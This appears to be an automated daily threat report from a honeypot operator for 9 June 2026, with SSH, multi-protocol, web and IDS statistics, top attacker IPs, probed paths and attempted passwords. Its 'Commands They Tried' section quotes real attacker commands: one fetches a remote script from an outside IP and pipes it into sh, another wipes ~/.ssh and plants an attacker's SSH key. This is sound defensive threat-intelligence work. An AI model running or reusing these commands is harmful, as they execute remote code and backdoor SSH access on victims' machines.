Tuesday, 9 June 2026 πŸ’€ critical

Daily Threat Report

642 SSH Connections
523 Login Attempts
605 Commands Run
110 SSH Unique IPs
2,580 Protocol Events
64 Protocol IPs
126 Web Hits
40 Web Service IPs

Top Attacker IPs

  1. 🌐 5.83.143.40 BGPβ†—
  2. 🌐 176.65.139.41 BGPβ†—
  3. 🌐 116.99.174.117 BGPβ†—
  4. 🌐 87.251.64.176 BGPβ†—
  5. 🌐 185.246.128.133 BGPβ†—

Top Passwords Tried

  1. aad3f9ba1d6740cc
  2. 91566946b1d8deb0
  3. 8d969eef6ecad3c2
  4. 8c6976e5b5410415
  5. 5e884898da280471

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 126 scanner requests from 40 unique IPs (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /
  3. /login
  4. /zc?action=getInfo
  5. /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Top User-Agents

  1. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  2. Mozilla/5.0
  3. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
  4. Go-http-client/1.1
  5. Hello World/1.0
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 333 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 333 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 333 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 333 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

aad3f9ba1d6740cc
91566946b1d8deb0
8d969eef6ecad3c2
8c6976e5b5410415
5e884898da280471

πŸ’» Commands They Tried

/bin/./uname -s -v -n -r -m
uname -a
uname -a; echo -e $_dq\x61\x75\x74\x68\x5F\x6F\x6B\x0A$_dq; (wget --no-check-certificate -qO- https://80.27.83.195/sh || curl -sk https://80.27.83.195/sh) | sh -s ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo $_dqssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr$_dq>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
uname -s -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 9 de June de 2026. Recorded 642 SSH connections on the Cowrie honeypot and 2580 multi-protocol events on OpenCanary, from 174 unique IPs. 333 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 523 login attempts from 110 unique IPs. Attackers executed 605 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 2580 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 64 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 126 HTTP requests from real scanners across 40 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 13177 alerts from 619 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’